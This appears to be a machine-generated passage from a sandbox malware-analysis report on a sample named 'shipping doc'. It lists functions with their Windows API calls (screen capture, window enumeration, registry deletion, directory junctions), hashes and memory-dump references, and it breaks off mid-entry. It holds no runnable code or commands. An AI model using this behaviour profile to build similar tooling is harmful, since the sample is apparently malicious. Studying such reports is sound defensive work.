                                                                                              • Opcode ID: 6d605c9fde5d0bef41e73f68b83b8a214493223881885681e4863c74001340e1
                                                                                              • Instruction ID: 16841c895ee416ebca61925937b6bb7657387aff487562397d400d476b5e3a6e
                                                                                              • Opcode Fuzzy Hash: 6d605c9fde5d0bef41e73f68b83b8a214493223881885681e4863c74001340e1
                                                                                              • Instruction Fuzzy Hash: 96C18B35208241AFD714DF24C895F6ABBE5BF84308F54845CF49A9B2A2CB31ED86CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 001625D8
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001625E8
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 001625F4
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00162601
                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0016266D
                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001626AC
                                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001626D0
                                                                                              • SelectObject.GDI32(?,?), ref: 001626D8
                                                                                              • DeleteObject.GDI32(?), ref: 001626E1
                                                                                              • DeleteDC.GDI32(?), ref: 001626E8
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 001626F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 2598888154-3887548279
                                                                                              • Opcode ID: 98525078369d5137c1f8e45caa544cd36b22a07f35e1629a9c087fa046cc4f61
                                                                                              • Instruction ID: f3d73853def2b8752169afb9bbf368438fbe88f5fce43ae6295ab537655c6ca9
                                                                                              • Opcode Fuzzy Hash: 98525078369d5137c1f8e45caa544cd36b22a07f35e1629a9c087fa046cc4f61
                                                                                              • Instruction Fuzzy Hash: DF61D2B5D00219EFCF14CFA4DC84AAEBBB6FF48310F208529E959A7250D774A991CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0011DAA1
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D659
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D66B
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D67D
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D68F
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D6A1
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D6B3
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D6C5
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D6D7
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D6E9
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D6FB
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D70D
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D71F
                                                                                                • Part of subcall function 0011D63C: _free.LIBCMT ref: 0011D731
                                                                                              • _free.LIBCMT ref: 0011DA96
                                                                                                • Part of subcall function 001129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000), ref: 001129DE
                                                                                                • Part of subcall function 001129C8: GetLastError.KERNEL32(00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000,00000000), ref: 001129F0
                                                                                              • _free.LIBCMT ref: 0011DAB8
                                                                                              • _free.LIBCMT ref: 0011DACD
                                                                                              • _free.LIBCMT ref: 0011DAD8
                                                                                              • _free.LIBCMT ref: 0011DAFA
                                                                                              • _free.LIBCMT ref: 0011DB0D
                                                                                              • _free.LIBCMT ref: 0011DB1B
                                                                                              • _free.LIBCMT ref: 0011DB26
                                                                                              • _free.LIBCMT ref: 0011DB5E
                                                                                              • _free.LIBCMT ref: 0011DB65
                                                                                              • _free.LIBCMT ref: 0011DB82
                                                                                              • _free.LIBCMT ref: 0011DB9A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 3b70a1ef65e781273eda176db178cbd49a868255d57ed5dc2f986fe33f50ceb3
                                                                                              • Instruction ID: 9beb67aa50ffb6a0fd2dc6ba5897e110e188702d7a857d5623dba38fe3cb5dde
                                                                                              • Opcode Fuzzy Hash: 3b70a1ef65e781273eda176db178cbd49a868255d57ed5dc2f986fe33f50ceb3
                                                                                              • Instruction Fuzzy Hash: 7E315A326086099FEB29AA39F845BDA77E8FF21324F114439E449DB191DF34ACE08724
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0014369C
                                                                                              • _wcslen.LIBCMT ref: 001436A7
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00143797
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0014380C
                                                                                              • GetDlgCtrlID.USER32(?), ref: 0014385D
                                                                                              • GetWindowRect.USER32(?,?), ref: 00143882
                                                                                              • GetParent.USER32(?), ref: 001438A0
                                                                                              • ScreenToClient.USER32(00000000), ref: 001438A7
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00143921
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0014395D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 4010501982-679674701
                                                                                              • Opcode ID: 8d2c59cf275386b996997f7a4ef3908c0bec0e0c1eea4b5e9effae11dd71ed4d
                                                                                              • Instruction ID: d983e978005aa94f4f18229edb1813cf0b2969fa3fdb1996755fb38b9deb46d3
                                                                                              • Opcode Fuzzy Hash: 8d2c59cf275386b996997f7a4ef3908c0bec0e0c1eea4b5e9effae11dd71ed4d
                                                                                              • Instruction Fuzzy Hash: DD91C271204606AFD719DF24C885FEAF7A9FF44354F108629F9A9D21A0DB30EA46CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00144994
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 001449DA
                                                                                              • _wcslen.LIBCMT ref: 001449EB
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 001449F7
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00144A2C
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00144A64
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00144A9D
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00144AE6
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00144B20
                                                                                              • GetWindowRect.USER32(?,?), ref: 00144B8B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                              • String ID: ThumbnailClass
                                                                                              • API String ID: 1311036022-1241985126
                                                                                              • Opcode ID: d2bfb04efc4ca3402df316756794c8e6051840a5f97aea0c2721d300b8394c8b
                                                                                              • Instruction ID: 8fee75bcf768cd52bd2f091570324dcb9d617683a525252e1242ea5d273723f2
                                                                                              • Opcode Fuzzy Hash: d2bfb04efc4ca3402df316756794c8e6051840a5f97aea0c2721d300b8394c8b
                                                                                              • Instruction Fuzzy Hash: 7E91CF711082059FDB04DF14C985FAA77E9FF84714F088469FD8A9B1A6EB30ED85CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0016CC64
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0016CC8D
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0016CD48
                                                                                                • Part of subcall function 0016CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0016CCAA
                                                                                                • Part of subcall function 0016CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0016CCBD
                                                                                                • Part of subcall function 0016CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0016CCCF
                                                                                                • Part of subcall function 0016CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0016CD05
                                                                                                • Part of subcall function 0016CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0016CD28
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0016CCF3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2734957052-4033151799
                                                                                              • Opcode ID: edca2306f087a3ea603fe756b9220373da8a126932c61315608cab0f7420a65f
                                                                                              • Instruction ID: bc4bffc0674103d856deb704b409a1a69b69b7822ecef3a18cd6b1c0c1004589
                                                                                              • Opcode Fuzzy Hash: edca2306f087a3ea603fe756b9220373da8a126932c61315608cab0f7420a65f
                                                                                              • Instruction Fuzzy Hash: AA316F75A01129BBDB209B94DC88EFFBB7CEF56750F000169F949E2240DB349E85DAE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00153D40
                                                                                              • _wcslen.LIBCMT ref: 00153D6D
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00153D9D
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00153DBE
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00153DCE
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00153E55
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00153E60
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00153E6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 1149970189-3457252023
                                                                                              • Opcode ID: 778e5acbaec7b28b1665cf35e017266990f5d3a989201ba64b23eeff06d00fae
                                                                                              • Instruction ID: 759adbd1dcae8a690bc968b02885272438d795e164dc18892591d00f1cb895f6
                                                                                              • Opcode Fuzzy Hash: 778e5acbaec7b28b1665cf35e017266990f5d3a989201ba64b23eeff06d00fae
                                                                                              • Instruction Fuzzy Hash: 3231B672500109ABDB219BA0DC49FEF37BDEF88741F5040B9F929D6051E77097888B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 0014E6B4
                                                                                                • Part of subcall function 000FE551: timeGetTime.WINMM(?,?,0014E6D4), ref: 000FE555
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0014E6E1
                                                                                              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0014E705
                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0014E727
                                                                                              • SetActiveWindow.USER32 ref: 0014E746
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0014E754
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0014E773
                                                                                              • Sleep.KERNEL32(000000FA), ref: 0014E77E
                                                                                              • IsWindow.USER32 ref: 0014E78A
                                                                                              • EndDialog.USER32(00000000), ref: 0014E79B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: 5c252e7bb304509e1aa0db42f7c3e51e8cbf51d009ef8713a60919debf9ab3c1
                                                                                              • Instruction ID: ac6b80705fb864353a9195b919fa14b4ca8ac46ae012e128eb2645732b8f79e6
                                                                                              • Opcode Fuzzy Hash: 5c252e7bb304509e1aa0db42f7c3e51e8cbf51d009ef8713a60919debf9ab3c1
                                                                                              • Instruction Fuzzy Hash: A821D870600204BFEB005F71ECCAE253BBAF75435AF211528F919C2AB1DB719CC48B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0014EA5D
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0014EA73
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014EA84
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0014EA96
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0014EAA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_wcslen
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2420728520-1007645807
                                                                                              • Opcode ID: 4a8a25fce50c9f2e271f2688449f5d0103be872d1d1fbfc8bcc92b18e004f72c
                                                                                              • Instruction ID: 7633465f6bda555b098abcdde9f4ca7dfb9c7130febe7b2e32310b97b75a612a
                                                                                              • Opcode Fuzzy Hash: 4a8a25fce50c9f2e271f2688449f5d0103be872d1d1fbfc8bcc92b18e004f72c
                                                                                              • Instruction Fuzzy Hash: F0111C25A902597DD724A7A2DC4ADFB6ABCEBD2B04F540429B811B30E2EFB05A45C5B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00145CE2
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00145CFB
                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00145D59
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00145D69
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00145D7B
                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00145DCF
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00145DDD
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00145DEF
                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00145E31
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00145E44
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00145E5A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00145E67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 7d4cd804768a8db78ae41eb9a9e279083e9cd81137e5debd7697d9065110b35b
                                                                                              • Instruction ID: 6bbec9b2f6fb03839c81abd3af629e73d8d6e2e8596ccc712b4b6b7d49e73b45
                                                                                              • Opcode Fuzzy Hash: 7d4cd804768a8db78ae41eb9a9e279083e9cd81137e5debd7697d9065110b35b
                                                                                              • Instruction Fuzzy Hash: 7B510E71A00605AFDB18CFA8DD89AAEBBB6FF48300F548129F519E6691D7709E44CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000F8BE8,?,00000000,?,?,?,?,000F8BBA,00000000,?), ref: 000F8FC5
                                                                                              • DestroyWindow.USER32(?), ref: 000F8C81
                                                                                              • KillTimer.USER32(00000000,?,?,?,?,000F8BBA,00000000,?), ref: 000F8D1B
                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00136973
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000F8BBA,00000000,?), ref: 001369A1
                                                                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000F8BBA,00000000,?), ref: 001369B8
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000F8BBA,00000000), ref: 001369D4
                                                                                              • DeleteObject.GDI32(00000000), ref: 001369E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 641708696-0
                                                                                              • Opcode ID: bddf748b0b4f9041b2cf9b0953fd2266ddaf48d7e68cd17836185db8ee48ea92
                                                                                              • Instruction ID: 59c04bca0408b257666d17d04c36aba0c4092a7ddacc017653ed8b4c20322f0a
                                                                                              • Opcode Fuzzy Hash: bddf748b0b4f9041b2cf9b0953fd2266ddaf48d7e68cd17836185db8ee48ea92
                                                                                              • Instruction Fuzzy Hash: 63617731102608EFDB359F15D958BBAB7F1FB4031AF55862CE2469BD60CB31A9D0EB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9944: GetWindowLongW.USER32(?,000000EB), ref: 000F9952
                                                                                              • GetSysColor.USER32(0000000F), ref: 000F9862
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: 43cf8f3be109f8bd676efb349d7e9671018f7459ac6f2e11c31a481cf2ad5c5f
                                                                                              • Instruction ID: 587c9307687aaae192913c069c92155bcb6ddb7605fa624bc02a55e10605754e
                                                                                              • Opcode Fuzzy Hash: 43cf8f3be109f8bd676efb349d7e9671018f7459ac6f2e11c31a481cf2ad5c5f
                                                                                              • Instruction Fuzzy Hash: D941C431104648EFDB305F389C88BB93BB5EB46370F544619FAA6875E1CB719D82EB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0012F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00149717
                                                                                              • LoadStringW.USER32(00000000,?,0012F7F8,00000001), ref: 00149720
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0012F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00149742
                                                                                              • LoadStringW.USER32(00000000,?,0012F7F8,00000001), ref: 00149745
                                                                                              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00149866
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
